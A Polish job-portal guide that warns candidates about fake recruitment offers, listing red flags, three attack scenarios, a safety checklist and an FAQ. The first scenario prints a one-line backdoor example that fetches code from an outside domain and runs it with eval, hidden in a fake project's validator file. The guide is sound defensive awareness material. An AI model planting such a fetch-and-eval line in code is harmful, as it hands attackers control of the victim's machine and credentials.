Oszustwa rekrutacyjne: jak rozpoznać fałszywą ofertę pracy

Autor: Redakcja ZatrudnijMnie 5 min czytania

Przewodnik dla kandydatów: 10 red flags fałszywych ofert, techniki hakerów (zbackdoorowane projekty, phishing) i 12-punktowa checklista bezpieczeństwa.

Oszustwa rekrutacyjne: jak rozpoznać fałszywą ofertę pracy

Fałszywe oferty pracy to nie science fiction — to realne zagrożenie, które w 2025 roku stało się jednym z najczęstszych wektorów ataków hakerskich. Cyberprzestępcy podszywają się pod rekruterów znanych firm (Amazon, Google, Meta), oferują kosmiczne wynagrodzenia i proszą o „zadanie rekrutacyjne". W środku? Złośliwy kod, który wykrada dane, hasła i portfele krypto. Poniżej znajdziesz kompletny przewodnik, jak rozpoznać oszustwo i chronić się na każdym etapie szukania pracy.

Dlaczego rekrutacja to idealny pretekst dla hakerów?

Emocje i presja czasu — szukasz pracy, otrzymujesz świetną ofertę i działasz szybko, bez analizy.
Naturalna wymiana plików — CV, portfolio, zadania testowe to standardowy element procesu.
Zaufanie do marki — logo Amazona czy Mety budzi zaufanie automatycznie.
Brak weryfikacji — rzadko sprawdzamy, czy rekruter faktycznie pracuje w danej firmie.

Sygnały ostrzegawcze: 10 red flags fałszywej oferty

Zbyt piękne wynagrodzenie — stawka 2–3x wyższa od rynkowej bez uzasadnienia.
Pierwszy kontakt z nieznajomego profilu — świeże konto, mało połączeń, brak historii.
Pilność i presja — „Odpowiedz dziś, bo zamykamy rekrutację".
Prośba o pobranie plików z zewnętrznego linku — ZIP, ISO, EXE zamiast standardowych platform.
Zadanie wymagające uruchomienia kodu — projekty w Node.js, Python z instrukcją „npm install && npm start".
Brak informacji o firmie w ogłoszeniu — tylko nazwa, bez adresu, KRS, strony kariery.
Komunikacja poza oficjalnymi kanałami — WhatsApp, Telegram zamiast firmowego maila.
Prośba o dane wrażliwe na wczesnym etapie — PESEL, numer konta, skan dowodu.
Błędy językowe i niespójności — literówki, dziwna składnia, mieszanka języków.
Brak możliwości weryfikacji — rekruter odmawia rozmowy wideo lub podania firmowego numeru telefonu.

Jak hakerzy atakują przez „zadania rekrutacyjne"

Scenariusz 1: Zbackdoorowany projekt (atak przez portal społecznościowy)

Programista otrzymuje wiadomość od „rekrutera" z kuszącą ofertą. Dostaje link do repozytorium z zadaniem testowym — pozornie standardowy projekt Next.js. W środku, ukryty w pliku server/middlewares/validator/index.js, znajduje się kod:

// Wygląda jak walidator, ale...
eval(fetch('https://chainlink-api-v3.com/payload').then(r => r.text()));

Po uruchomieniu npm start haker uzyskuje pełny dostęp do komputera — klucze SSH, hasła z przeglądarki, portfele krypto.

Obrona: Nigdy nie uruchamiaj nieznanego kodu bez analizy. Szukaj eval(), exec(), child_process, podejrzanych requestów sieciowych.

Scenariusz 2: Fałszywe narzędzia (case z Amazon)

Grupa UNC4034 z Korei Północnej kontaktuje się przez e-mail, oferując pracę w Amazon. Na WhatsApp przesyłają plik ISO amazon_assessment.iso z „instrukcjami do zadania". W środku: zmodyfikowany klient PuTTY z trojanem AIRDRY.V2.

Obrona: Pobieraj oprogramowanie tylko z oficjalnych źródeł. Sprawdzaj podpis cyfrowy plików wykonywalnych.

Scenariusz 3: Wyłudzenie danych osobowych

„Rekruter" prosi o wypełnienie formularza z danymi do „umowy NDA" — PESEL, numer dowodu, adres zamieszkania. Dane trafiają do kradzieży tożsamości.

Obrona: Żaden pracodawca nie potrzebuje PESEL przed podpisaniem umowy o pracę.

Checklista bezpieczeństwa dla kandydata (12 punktów)

Przed odpowiedzią na ofertę:

✅ Sprawdź profil rekrutera — staż konta, liczba połączeń, historia aktywności.
✅ Zweryfikuj firmę — strona kariery, KRS, opinie w internecie.
✅ Porównaj wynagrodzenie z rynkiem — użyj raportów płacowych.
✅ Poszukaj oferty na oficjalnej stronie firmy.

Podczas procesu rekrutacji:

✅ Komunikuj się przez oficjalne kanały (firmowy e-mail, telefon z centralą).
✅ Poproś o rozmowę wideo — fałszywi rekruterzy często odmawiają.
✅ Nie pobieraj plików z nieznanych źródeł (Google Drive anonimowego konta, WeTransfer).
✅ Nie uruchamiaj kodu bez analizy — użyj maszyny wirtualnej lub sandboxa.

Ochrona danych:

✅ Nie podawaj PESEL, numeru konta, skanu dowodu przed zatrudnieniem.
✅ Przygotuj „publiczną" wersję CV bez wrażliwych danych.
✅ Używaj dedykowanego adresu e-mail do rekrutacji.
✅ Włącz 2FA na wszystkich kontach (portale społecznościowe, e-mail, GitHub).

Co zrobić, gdy podejrzewasz oszustwo?

Przerwij komunikację — nie klikaj w żadne linki, nie pobieraj plików.
Zgłoś nadużycie — na ZatrudnijMnie użyj przycisku „Zgłoś" przy podejrzanym ogłoszeniu lub skorzystaj z formularza kontaktowego.
Poinformuj firmę — jeśli oszuści podszywają się pod istniejącą firmę, zgłoś to działowi bezpieczeństwa.
Sprawdź swoje urządzenie — jeśli uruchomiłeś podejrzany kod, przeskanuj system antywirusem.
Zmień hasła — szczególnie jeśli używasz tych samych na różnych kontach.
Zgłoś na policję — cyberprzestępstwa można zgłaszać na cert.pl.

Bezpieczna rekrutacja na ZatrudnijMnie

Na ZatrudnijMnie dbamy o bezpieczeństwo:

Weryfikacja rekruterów — płatny dostęp ogranicza fałszywe konta.
Brak wymiany plików poza platformą — CV przechowywane w bezpiecznym systemie.
Przejrzysty proces — rekruter widzi tylko dane, które udostępniasz.
Zgłaszanie nadużyć — każde podejrzane zachowanie możesz zgłosić.

FAQ

Czy prawdziwy rekruter prosi o zadanie z uruchomieniem kodu?
Rzadko. Większość firm używa platform typu HackerRank, Codility, gdzie kod uruchamia się w przeglądarce. Jeśli ktoś prosi o pobranie projektu — zachowaj ostrożność.

Czy mogę bezpiecznie otworzyć CV/portfolio przesłane przez rekrutera?
Unikaj otwierania plików .exe, .iso, .zip z nieznanych źródeł. PDF i DOCX są bezpieczniejsze, ale też mogą zawierać makra.

Co jeśli już uruchomiłem podejrzany kod?
Odłącz komputer od sieci, przeskanuj antywirusem, zmień hasła do kluczowych kont (e-mail, bank, portfele krypto) z innego urządzenia.

Perspektywa ZatrudnijMnie

Kandydat jest bezpieczniejszy wtedy, gdy nie rozprasza procesu między wiele niespójnych kanałów i nie wysyła danych wrażliwych poza kontrolowanym środowiskiem. Im bardziej uporządkowany kontakt z rekruterem, tym łatwiej wychwycić coś podejrzanego.
W praktyce najwięcej ryzyka pojawia się tam, gdzie emocje wygrywają z weryfikacją. Jeśli oferta wygląda zbyt dobrze, a druga strona naciska na pośpiech, pobieranie plików albo przekazanie danych — zatrzymaj proces i sprawdź fakty.

Dalsze kroki

Dodaj swoje ogłoszenie i daj się znaleźć zweryfikowanym rekruterom: Dodaj ogłoszenie kandydata
Przejrzyj ogłoszenia innych kandydatów: Przeglądaj ogłoszenia

Zobacz także

Dlaczego warto zaufać temu materiałowi

Zobacz hub: Bezpieczeństwo rekrutacji

Materiały o cyberbezpieczeństwie, oszustwach rekrutacyjnych, ochronie danych i bezpiecznych procesach HR.

Materiał został przygotowany redakcyjnie przez Redakcja ZatrudnijMnie i porządkuje kluczowe decyzje związane z obszarem „Bezpieczeństwo rekrutacji”.
Treść została ukierunkowana na potrzeby kandydatów i ma na celu uporządkować temat i przekazać praktyczne wskazówki.
W materiale uwzględniono ryzyka operacyjne, ochronę danych i dobre praktyki cyberbezpieczeństwa ważne dla bezpiecznej rekrutacji.

bezpieczeństwo oszustwa rekrutacyjne phishing cyberbezpieczeństwo

Oszustwa rekrutacyjne: jak rozpoznać fałszywą ofertę pracy

Dlaczego rekrutacja to idealny pretekst dla hakerów?

Sygnały ostrzegawcze: 10 red flags fałszywej oferty

Jak hakerzy atakują przez „zadania rekrutacyjne"

Scenariusz 1: Zbackdoorowany projekt (atak przez portal społecznościowy)

Scenariusz 2: Fałszywe narzędzia (case z Amazon)

Scenariusz 3: Wyłudzenie danych osobowych

Checklista bezpieczeństwa dla kandydata (12 punktów)

Przed odpowiedzią na ofertę:

Podczas procesu rekrutacji:

Ochrona danych:

Co zrobić, gdy podejrzewasz oszustwo?

Bezpieczna rekrutacja na ZatrudnijMnie

FAQ

Perspektywa ZatrudnijMnie

Dalsze kroki

Zobacz także

Powiązane artykuły

Bezpieczeństwo w rekrutacji: przewodnik dla rekruterów

Reverse recruiting: jak to działa i dlaczego warto

Jak zwiększyć szansę na zatrudnienie: 11 konkretnych sposobów